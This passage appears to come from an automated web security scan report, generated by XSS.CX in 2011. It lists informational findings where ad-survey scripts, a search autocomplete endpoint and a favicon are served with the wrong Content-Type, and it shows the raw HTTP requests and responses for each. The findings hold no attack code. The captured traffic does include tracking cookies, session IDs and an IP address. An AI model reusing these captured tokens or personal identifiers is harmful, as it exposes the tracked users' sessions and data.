The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:02:39 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 164
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


22.5. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/sta.php?survey_num=913132&site=16161131484279092&code=8029877&ut_sys=mplx HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:05:09 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


22.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:41:39 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 354
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen
...[SNIP]...

22.7. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p108883753&1316282696361 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:11:47 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

22.8. http://blekko.com/autocomplete  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /autocomplete?query=wpp HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: sessionid=830337972; path=/; expires=Sat, 17 Sep 2011 18:43:08 GMT
Cache-Control: max-age=43200
Expires: Sun, 18 Sep 2011 02:43:08 GMT
Vary: Accept-Encoding
X-Blekko-PT: 855aaf303f14a0aa9fc97c82869447c8
Content-Length: 185

{"suggestions":["wpp","wpp /techblogs","wpp /news-magazine","wpp /tech","wppi","wpp group","wpp group /news-magazine","wpp group /techblogs","wpp group /reviews","wppsi"],"query":"wpp"}

22.9. http://www.peopleschoice.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; __utma=61498413.1690544870.1316282695.1316282695.1316282695.1; __utmb=61498413; __utmc=61498413; __utmz=61498413.1316282695.1.1.utmccn=(referral)|utmcsr=wonderwall.msn.com|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:13 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 05:38:04 GMT
ETag: "c90412-13e-49447ada98700"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ................................................f...ff.fff.f3f.f33.333.3.3.3...................x..dF.....1.................`..........Z........`.[..0..0.......@...:...`.
...[SNIP]...

Report generated by XSS.CX at Sat Sep 17 15:04:34 CDT 2011.